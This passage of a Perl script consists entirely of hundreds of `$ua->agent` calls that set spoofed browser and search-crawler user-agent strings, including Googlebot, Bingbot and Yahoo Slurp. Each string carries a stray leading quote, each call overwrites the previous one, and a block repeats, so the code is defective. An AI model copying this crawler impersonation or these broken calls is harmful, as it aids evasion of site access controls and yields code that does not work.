  5659. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5660. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5661. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5662. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5663. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5664. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5665. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5666. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5667. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5668. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5669. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5670. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5671. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5672. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5673. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5674. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5675. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  5676. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  5677. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  5678. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  5679. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  5680. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5681. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5682. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  5683. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  5684. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  5685. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  5686. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  5687. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5688. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5689. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5690. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5691. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  5692. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5693. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  5694. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  5695. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  5696. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  5697. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5698. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  5699. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  5700. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  5701. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  5702. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  5703. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  5704. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  5705. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  5706. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  5707. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  5708. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  5709. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5710. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5711. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  5712. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  5713. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  5714. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  5715. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5716. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  5717. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5718. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  5719. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  5720. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  5721. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  5722. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5723. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  5724. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  5725. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  5726. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5727. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5728. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5729. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5730. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5731. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5732. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5733. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5734. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5735. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5736. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5737. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5738. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5739. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5740. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5741. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5742. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5743. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5744. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5745. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5746. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5747. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5748. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5749. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5750. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5751. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5752. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5753. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5754. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5755. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5756. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5757. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5758. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5759. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5760. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5761. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5762. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5763. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5764. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5765. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5766. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5767. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5768. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5769. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5770. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5771. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5772. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5773. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5774. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  5775. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5776. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  5777. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  5778. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  5779. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  5780. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  5781. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  5782. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  5783. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  5784. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  5785. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5786. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  5787. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  5788. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  5789. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  5790. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  5791. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  5792. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5793. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  5794. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5795. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5796. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5797. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5798. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5799. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5800. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5801. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5802. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5803. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5804. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5805. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5806. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  5807. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  5808. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5809. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5810. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5811. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5812. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5813. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5814. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
  5815. $ua->agent("'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)");
  5816. $ua->agent("'Wget/1.8.2");
  5817. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0");
  5818. $ua->agent("'Mediapartners-Google/2.1");
  5819. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7");
  5820. $ua->agent("'Mozilla/4.04 [en] (WinNT; I)");
  5821. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)");
  5822. $ua->agent("'lwp-trivial/1.41");
  5823. $ua->agent("'NetBSD-ftp/20031210");
  5824. $ua->agent("'Dillo/0.8.5-i18n-misc");
  5825. $ua->agent("'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)");
  5826. $ua->agent("'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d");
  5827. $ua->agent("'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d");
  5828. $ua->agent("'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)");
  5829. $ua->agent("'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d");
  5830. $ua->agent("'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)");
  5831. $ua->agent("'Wget/1.10.1");
  5832. $ua->agent("'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)");
  5833. $ua->agent("'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)");
  5834. $ua->agent("'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1");
  5835. $ua->agent("'Opera/8.52 (X11; Linux i386; U; de)");
  5836. $ua->agent("'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1");
  5837. $ua->agent("'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711");
  5838. $ua->agent("'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)");
  5839. $ua->agent("'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)");
  5840. $ua->agent("'Opera/5.0 (SunOS 5.8 sun4m; U) [en]");
  5841. $ua->agent("'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)");
  5842. $ua->agent("'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d");
  5843. $ua->agent("'Wget/1.8.1");
  5844. $ua->agent("'Wget/1.9.1");
  5845. $ua->agent("'tnftp/20050625");
  5846. $ua->agent("'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)");
  5847. $ua->agent("'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16");
  5848. $ua->agent("'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122");
  5849. $ua->agent("'Wget/1.7");
  5850. $ua->agent("'Lynx/2.8.2rel.1 libwww-FM/2.14");
  5851. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53");
  5852. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)");
  5853. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5854. $ua->agent("'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e");
  5855. $ua->agent("'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)");
  5856. $ua->agent("'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i");
  5857. $ua->agent("'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5");
  5858. $ua->agent("'Opera/8.51 (X11; Linux i386; U; de)");
  5859. $ua->agent("'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)");
  5860. $ua->agent("'Links (0.96; OpenBSD 3.0 sparc)");
  5861. $ua->agent("'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c");
  5862. $ua->agent("'Lynx/2.8.3rel.1 libwww-FM/2.14");
  5863. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5864. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  5865. $ua->agent("'libwww-perl/5.79");
  5866. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53");
  5867. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7");
  5868. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)");
  5869. $ua->agent("'msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  5870. $ua->agent("'Googlebot/2.1 (+http://www.google.com/bot.html)");
  5871. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5872. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7");
  5873. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51");
  5874. $ua->agent("'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)");
  5875. $ua->agent("'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c");
  5876. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)");
  5877. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  5878. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5879. $ua->agent("'Mozilla/4.8 [en] (Windows NT 5.1; U)");
